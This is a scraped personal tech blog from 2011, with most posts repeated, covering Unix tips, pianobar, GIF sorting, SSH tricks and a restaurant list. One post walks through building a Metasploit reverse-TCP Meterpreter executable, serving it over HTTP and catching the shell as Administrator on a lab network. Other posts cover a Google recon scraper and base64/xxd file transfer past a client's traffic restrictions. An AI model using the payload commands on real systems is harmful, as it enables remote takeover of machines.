Simply copying the default one over to my dir fixed my problem:
Now vi & vim aren't so retarded...
Simply copying the default one over to my dir fixed my problem:
cp /etc/vim/vimrc ~/.vimrc
Now vi & vim aren't so retarded...
Sunday, April 24, 2011
Use Pandora ? you'll want Pianobar
I love Pandora.com, it provides me the majority of my new music selections/artists. The problem is that pandora has a few usability issues (with good reason). Pianobar is a command line tool that will login to pandora, grab your playlists, and play any one you want. And it has a feature that makes it all worth it- infinite skips.
Here is the install site:
https://github.com/PromyLOPh/pianobar
Install it, I have it on every machine that I listen on, its awesome.
The following is the output of the menu command that outlines a lot of what the prog does;
+ love song
- ban song
a add music to station
c create new station
d delete station
e explain why this song is played
g add genre station
h song history
i print information about song/station
j add shared station
m move song to different station
n next song
p pause/continue
q quit
r rename station
s change station
t tired (ban song for 1 month)
u upcoming songs
x select quickmix stations
b bookmark song/artist
( decrease volume
) increase volume
= delete seeds/feedback
as you can see, it is versatile.
Here is the install site:
https://github.com/PromyLOPh/pianobar
Install it, I have it on every machine that I listen on, its awesome.
The following is the output of the menu command that outlines a lot of what the prog does;
+ love song
- ban song
a add music to station
c create new station
d delete station
e explain why this song is played
g add genre station
h song history
i print information about song/station
j add shared station
m move song to different station
n next song
p pause/continue
q quit
r rename station
s change station
t tired (ban song for 1 month)
u upcoming songs
x select quickmix stations
b bookmark song/artist
( decrease volume
) increase volume
= delete seeds/feedback
as you can see, it is versatile.
Google Ruby Script
My friend coded this for our team. It will take a google search query, and parse out the returned URLs one on a line. It comes in handy for scripting recon on a client. Obviously you need the nokogiri gem installed.
I hope you find it useful...
#!/usr/bin/ruby require 'rubygems' require 'nokogiri' require 'open-uri' # Perform a google search # Add numbers in increments of 10 to the array to search more pages [0].each do |num| doc = Nokogiri::HTML(open('http://google.com/search?q=' + ARGV[0].to_s + '&start='+num.to_s)) puts "Scrubbing Google for good-ness" doc.xpath('//h3/a[@class="l"]').each do |link| temp = link.attribute("href") puts temp end end
Organizing my /gif
I have accumulated MANY gif files over the year. The problem is a gif can both be static or animated. I wanted all my animated gifs in one folder. After a little research on wikipedia I discovered that the original gif specification didnt allow for animation. Gifs that animate have a header containing the value "NETSCAPE2.0". Knowing this, it was trivial to sort animated vs static gifs. As shown in the following bash one liner:
Lol, i was creating this nice long script that would do checks and verifications and all that crap...meh...one liner ftw...
A little explanation:
A search through wikipedia taught me that animated GIFs should contain a certain header value: "NETSCAPE2.0". The bash line, searches for all files in a directory, greps the file for the header NETSCAPE2.0 and moves the file to animooted_gifs directory. If it doesnt detect NETSCAPE2.0, it moves on to the next file.
Running the unix util "file" on the gif doesnt yield much. As you can see below, a static gif and an animated gif report the same properties (obviously the size will be different since they are two different gifs):
BUT, if you run strings through the files you will see something different:
If you have been paying attention, you will know which file is the animated one (hint, its the 2nd one).
NOTE: Some files are constructed in a retarded way for some reason and don't have the NETSCAPE2.0 header even though they are animated. I have found this to be a rare exception to the rule. In any case, my one-liner should sort the vast majority of the animated GIFs into the correct location.
mkdir animooted_gifs; for i in *; do if head $i | grep 'NETSCAPE2.0'; then mv $i animooted_gifs/$i; fi;done
Lol, i was creating this nice long script that would do checks and verifications and all that crap...meh...one liner ftw...
A little explanation:
A search through wikipedia taught me that animated GIFs should contain a certain header value: "NETSCAPE2.0". The bash line, searches for all files in a directory, greps the file for the header NETSCAPE2.0 and moves the file to animooted_gifs directory. If it doesnt detect NETSCAPE2.0, it moves on to the next file.
Running the unix util "file" on the gif doesnt yield much. As you can see below, a static gif and an animated gif report the same properties (obviously the size will be different since they are two different gifs):
gifs/1266641860129.gif: GIF image data, version 89a, 1003 x 1217
gifs/1245733506951.gif: GIF image data, version 89a, 375 x 375
BUT, if you run strings through the files you will see something different:
$ strings 1245733506951.gif
GIF89aw
33 84...
$ strings 1245733506951.gif
GIF89aw
33 84
...
NETSCAPE2.0
...
If you have been paying attention, you will know which file is the animated one (hint, its the 2nd one).
NOTE: Some files are constructed in a retarded way for some reason and don't have the NETSCAPE2.0 header even though they are animated. I have found this to be a rare exception to the rule. In any case, my one-liner should sort the vast majority of the animated GIFs into the correct location.
Monday, April 18, 2011
SSH Escape Sequence
If i'm SSH'd into a box and lose my internet connection, the ssh session will most likely just hang there like a retard. SSH has an escape sequence similar to telnet's ctrl+]
hit enter
then type ~.
That will close the ssh session and return you to the shell. ~? will return a help menu with different escape options that SSH accepts. the list is below:
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)
Now you dont have to lose your terminal window! yay!
hit enter
then type ~.
That will close the ssh session and return you to the shell. ~? will return a help menu with different escape options that SSH accepts. the list is below:
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)
Now you dont have to lose your terminal window! yay!
Friday, March 25, 2011
Major Experiment
I decided to delete all of my RSS feeds from google reader. I had over 60 subscriptions that I felt I needed to go through on a daily basis. Well recently, I discovered myself spending too much time on feeds. So, in response, I decided to delete them all to see how my productivity increases.
I have enough friends/chat channels so that I dont miss anything major that is happening in the field. I will edit this blog post with my thoughts/findings regarding this experiment :D
EDIT: So its been less than 24h and I have already been discovering new blogs/reading on things I have been meaning to learn for a while now. I did decide to actually have 3 subscriptions on my reader though(ITS NOT CHEATING I SWEAR). The subscriptions are xkcd, questionable content comic, and woot.com. I dont consider it cheating because those take all of 5 seconds to check and i check them regularly anyway.
I have enough friends/chat channels so that I dont miss anything major that is happening in the field. I will edit this blog post with my thoughts/findings regarding this experiment :D
EDIT: So its been less than 24h and I have already been discovering new blogs/reading on things I have been meaning to learn for a while now. I did decide to actually have 3 subscriptions on my reader though(ITS NOT CHEATING I SWEAR). The subscriptions are xkcd, questionable content comic, and woot.com. I dont consider it cheating because those take all of 5 seconds to check and i check them regularly anyway.
Wednesday, March 23, 2011
Generate hashes
Here is a webpage that will generate many different hashes from text.
http://www.insidepro.com/hashes.php
Im still looking for a program that will do that via command line...i should probably just code it myself.
http://www.insidepro.com/hashes.php
Im still looking for a program that will do that via command line...i should probably just code it myself.
FCC ID Search
Hardware hackers will find this useful:
http://www.fcc.gov/oet/ea/fccid/
Its a webpage that will search the FCC database for the FCC ID you supply it. The results are publicly available files/photos/documentation that the manufacturer uploaded.
useful...
http://www.fcc.gov/oet/ea/fccid/
Its a webpage that will search the FCC database for the FCC ID you supply it. The results are publicly available files/photos/documentation that the manufacturer uploaded.
useful...
Wednesday, March 16, 2011
Learning yourself
Perhaps the best skill/hack you could possibly do is learning your own system.
How do you think?
why do you think the way you do?
what motivates you?
what makes you lazy?
why do you get angry at certain things? and what can you do to recognize and stop it?
What makes you, you?
Most people will go their entire lives without understanding themselves, and will inherently become their own slaves. But, I firmly believe this one statement:
A man who is God of himself, is a God to others.
There is no large leap, or epiphany that can cause you to fully understand yourself. It all comes in small parts, small epiphanies, specific, and detailed. Good example is what happened to me today. I realized that trying to prioritize multiple items that have multiple levels of importance can mess with my head, therefore, knocking out the simpler, quicker tasks first allows me to only have to worry about a smaller number of items. Now that I have reduced my amount of items from 10 to 3, I only have to devote my attention to 3 items. Which is MUCH easier to handle than 10 different things at once.
May seems very simple and obvious, but when something like that changes how you manage your time, you become more efficient, and have more time to do other things.
Its just a little philosophy that I thought I would impart on anyone whos interested.
How do you think?
why do you think the way you do?
what motivates you?
what makes you lazy?
why do you get angry at certain things? and what can you do to recognize and stop it?
What makes you, you?
Most people will go their entire lives without understanding themselves, and will inherently become their own slaves. But, I firmly believe this one statement:
A man who is God of himself, is a God to others.
There is no large leap, or epiphany that can cause you to fully understand yourself. It all comes in small parts, small epiphanies, specific, and detailed. Good example is what happened to me today. I realized that trying to prioritize multiple items that have multiple levels of importance can mess with my head, therefore, knocking out the simpler, quicker tasks first allows me to only have to worry about a smaller number of items. Now that I have reduced my amount of items from 10 to 3, I only have to devote my attention to 3 items. Which is MUCH easier to handle than 10 different things at once.
May seems very simple and obvious, but when something like that changes how you manage your time, you become more efficient, and have more time to do other things.
Its just a little philosophy that I thought I would impart on anyone whos interested.
Thursday, March 10, 2011
Auto restart your SSH connection
Here is a simple bash one liner that will automatically restart your ssh connection if it drops.
while true; do ssh user@server.com; sleep 15; done
It's simple, this will run until killed. The first thing the loop does is start up ssh and since it cant continue until ssh exists, its effectively a method to always restart the connection (without duplicating the process)
This assumes you have key auth setup and ready to go.
TIGERBLOOD
while true; do ssh user@server.com; sleep 15; done
It's simple, this will run until killed. The first thing the loop does is start up ssh and since it cant continue until ssh exists, its effectively a method to always restart the connection (without duplicating the process)
This assumes you have key auth setup and ready to go.
TIGERBLOOD
Tuesday, March 8, 2011
Create file from hex dump
So im working on a client and they have the most restrictive traffic rules i've ever seen. I cant transfer any files whatsoever. I figured out I could do this today:
1.xxd NameOfFile
2.copy the output
3.paste it into a file
4.xxd -r file file1
5.open with respective program
Basically what is happening is that you are generating the hex code via xxd and regenerating the binary via xxd -r.
This effectively allows you to transfer files when all you can do is run commands on them.
fuck yeah this makes my life easier.
EDIT: lol i totally forgot turning binaries into text was THE job of the base64 encoding algorithm. so its basically the same steps but with base64...
1. base64 filename
2. copypasta into another file
3. base64 -d newfilename
4. open with respective program
the base64 program has the added benefit of having less to copy/paste over.
EDIT: lol i totally forgot turning binaries into text was THE job of the base64 encoding algorithm. so its basically the same steps but with base64...
1. base64 filename
2. copypasta into another file
3. base64 -d newfilename
4. open with respective program
the base64 program has the added benefit of having less to copy/paste over.
Sunday, March 6, 2011
Awesome Chicago Noms
I'm really posting this just so I can keep track of it. My sister sent me quite a few places she thought were awesome. Since she and I have very similar tastes, I plan on going to these places sometime in the future.
- Thai Bowl - Thai
- Near UIC campus...
- Yummy Thai - Thai
- Sabor A Cuba - Cuban
- Bonefish Grill - Seafood
- Rocking Horse - American
- Wildfire - American
- Zad - Middle Eastern
- Jia's Restuarant - Chinese Cuisine/Sushi Bar
- Maggiano's Little Italy - Italian
- Order their Rigatoni D!!
- La Luce - Italian
- Pick Me Up Cafe - American
- Nookies - American
- Glenn's Diner - American Diner/Seafood
- Piece Brewery & Pizzeria - American
- Rock Bottom - American Fare/Brewery
- Hopleaf - American/European
- Joy's - Thai
- Bamee Noodle Shop - Asian
- Hot Doug's - Casual American
- Aloha Eats - Hawaiian Grill
- Penny's Noodle Shop - Asian
- Noodles & Company - Mixed Cuisine
- Hachi's Kitchen - Japanese
- Phil Stefani's 437 Rush - Italian/Steakhouse
Near UIC
Bars with Food
Saturday, March 5, 2011
Simple meterpreter call back payload
The following are commands in order to get a meterpreter session contained in a binary that will be run by the target system to connect back to the listener.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.166 X > /var/www/rawr.exe
Whats happening here? well the first thing we are doing is generating the actual payload that the victim will execute. Note: we are not actually exploiting any vulnerability here, this binary simply contains the meterpreter reverse TCP connect payload (windows/meterpreter/reverse_tcp). You have to set LHOST to the actual listening box (i know, counterintuitive). X is the shortcut to "exploit" in metasploit. Normally msfpayload outputs the binary contents to stdout so you can redirect it wherever you want, here i just redirect it to rawr.exe in my web root directory so I can download it via a web browser.
What happens now (once i start apache) is I go to the victim machine, and type "http://192.168.1.166/rawr.exe" in order to download it. Once downloaded, i run it.
NOTE===============
You need to run the following command before you run the windows binary (otherwise it will connect to nothing and you will have to re-execute the binary)
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E
This command starts up metasploit with the arguments as conditions. msf will start the multi handler to listen for the connection, the rest of the arguments are the same as the msfpayload command. *now run the windows payload*
what should happen is you should get this:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E
[*] Please wait while we load the module tree...
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11879 updated today (2011.03.05)
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.166
[*] Started reverse handler on 192.168.1.166:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.193
[*] Meterpreter session 1 opened (192.168.1.166:4444 -> 192.168.1.193:1393) at Sat Mar 05 02:22:40 -0500 2011
meterpreter > getuid
Server username: WINXP\Administrator
Figure out what alias to create
A simple bash one liner that will read through your bash history and print out your most typed binaries:
history | cut -d ' ' -f 5 | sort | uniq -c | sort -n
Tuesday, February 1, 2011
Grep AND/OR pattern matching
Simple once you understand it, lots of people ask about it:
#Return instances of lines containing string1 AND string2
grep string1.*string2 filename
What is happeneing here is that you are searching for string1, zero or more (*) of any characters (.) and then string2. NOTICE: it will only return lines that have string1 before string2
#Return instances of lines containing string1 OR string2
grep "string1|string2"
Classical OR operator, the pipe. This will test for lines containing either string1 or string2 and return those lines.
#Return instances of lines containing string1 AND string2
grep string1.*string2 filename
What is happeneing here is that you are searching for string1, zero or more (*) of any characters (.) and then string2. NOTICE: it will only return lines that have string1 before string2
#Return instances of lines containing string1 OR string2
grep "string1|string2"
Classical OR operator, the pipe. This will test for lines containing either string1 or string2 and return those lines.
Subscribe to:
Posts (Atom)